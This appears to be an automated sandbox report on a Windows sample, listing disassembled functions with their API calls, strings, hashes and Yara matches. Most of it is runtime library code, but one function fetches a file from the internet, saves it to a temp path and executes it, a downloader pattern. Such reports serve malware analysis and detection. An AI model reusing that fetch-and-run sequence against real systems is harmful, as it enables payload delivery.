Instruction Fuzzy Hash: 7DB18C71A002099FDF21DF69C890BAEBBF5BF08304F14456FE495A7351EB75A841CB20

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 024AA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024AA8A3

Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C0F
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C21
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C33
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C45
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C57
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C69
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C7B
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C8D
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C9F
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CB1
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CC3
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CD5
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CE7

_free.LIBCMT ref: 024AA898

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA8BA
_free.LIBCMT ref: 024AA8CF
_free.LIBCMT ref: 024AA8DA
_free.LIBCMT ref: 024AA8FC
_free.LIBCMT ref: 024AA90F
_free.LIBCMT ref: 024AA91D
_free.LIBCMT ref: 024AA928
_free.LIBCMT ref: 024AA960
_free.LIBCMT ref: 024AA967
_free.LIBCMT ref: 024AA984
_free.LIBCMT ref: 024AA99C

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 61d5de76b14839442d11903472a2cdec6576f1d17c1d549a5c928842c304e09d
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 963169316006109FEB30AF3AD864B5BB7FABF20790F15486FE449D7650EB75E890CA64

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02472C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02472C94
GetTempPathW.KERNEL32(00000105,?), ref: 02472CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02472CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02472CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02472D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02472D58
ShellExecuteExW.SHELL32(?), ref: 02472DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02472DE4

Strings

<, xrefs: 02472DAC

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: 22b57108b106403687976060af338e9340447ede32335b889625f8e81898c464
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 15414F7190021DAFEB20DF659C85FEAB7BCFF05745F0080EAA559A2150DFB09E858FA4

Function 0248EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D

Strings

advapi32.dll, xrefs: 0248EEF3, 0248EEF8, 0248EF14

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: be539c59c0a4feddeb50347d1f5abeb56d576b029bf47a9ed791a1a492c616bd
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: A1217CB1914651BFE7107FB4DC08A5EBBA8EF05B16F004A2AF555E3640CBBC94418FA8

Function 0248EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D

Strings

advapi32.dll, xrefs: 0248EEF3, 0248EEF8, 0248EF14

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 38840c7213b1f9bc860e98fb0ddd366cafa539f947be498571399ad82e86b70b
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 2E218EB1914751BFE7107FA4DC08A5ABBECEF05B16F004A2BF555E3640CBBC94418BA8

Function 024824A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
GetProcAddress.KERNEL32(00000000), ref: 02482507
GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
__CxxThrowException@8.LIBVCRUNTIME ref: 02482552

Strings

kernel32.dll, xrefs: 024824B0, 024824B5, 024824FA

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 64c3c52ceab967ea1986fba65a5ecdcf1e2e5302cd2743fb97272074f9df90ec
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: E711C2759103517FE710BBB5AC59A6F3BECDE06B12720052BB801E2291EBB8D5008A6C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

pContext, xrefs: 00424946
switchState, xrefs: 00424882

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 0041513E Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249

Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272

Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153

Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48

Function 024853A5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024854B0

Part of subcall function 02484EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02484ED5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 024854D9

Part of subcall function 0248333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02483357

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02485500
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 024853BA

Part of subcall function 0248339F: __EH_prolog3_GS.LIBCMT ref: 024833A6
Part of subcall function 0248339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 024833B5
Part of subcall function 0248339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 024833BC
Part of subcall function 0248339F: GetCurrentThread.KERNEL32 ref: 024833E4
Part of subcall function 0248339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 024833EE

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024853DB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02485412
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02485455
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02485548
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0248556C
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02485579

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: ec1f16e40baab32c02cbf91ea27a877f726b235705fac7ff2e0b1e332acdcbbc
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 3D61A9719203119FCB18EFA5E8D17AEBBA2FF44716FA5807EC446A7282C730A941CF44

Function 02490C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02490C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02490C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02490CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02490D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02490D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02490D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02490D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02490D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02490DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02490DBC

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: 299487b525ae075706d47c35fb448070024d7cbc4596ec6adf551d963ab329b9
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: CC41B230A142489BDF19FFA5C4547FD7BA6AF42304F14406FD8166B382CB659A09CF65

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 024A204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024A2061

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024A206D
_free.LIBCMT ref: 024A2078
_free.LIBCMT ref: 024A2083
_free.LIBCMT ref: 024A208E
_free.LIBCMT ref: 024A2099
_free.LIBCMT ref: 024A20A4
_free.LIBCMT ref: 024A20AF
_free.LIBCMT ref: 024A20BA
_free.LIBCMT ref: 024A20C8

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 50f597ad08e1649174e4b31d26c983b551346de7ec64346999a12fc7123fd680
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 8F117476600508AFCB51EF5AC851CD93FA6EF14790B5140AABE098F221EB71EE609F80

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

log, xrefs: 0043EF6B, 0043EF77
sqrt, xrefs: 0043F049
pow, xrefs: 0043EFA9, 0043F055, 0043F068
acos, xrefs: 0043F03D
log10, xrefs: 0043EF0F, 0043EF5F
asin, xrefs: 0043F031
exp, xrefs: 0043EF8A, 0043EFEC

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
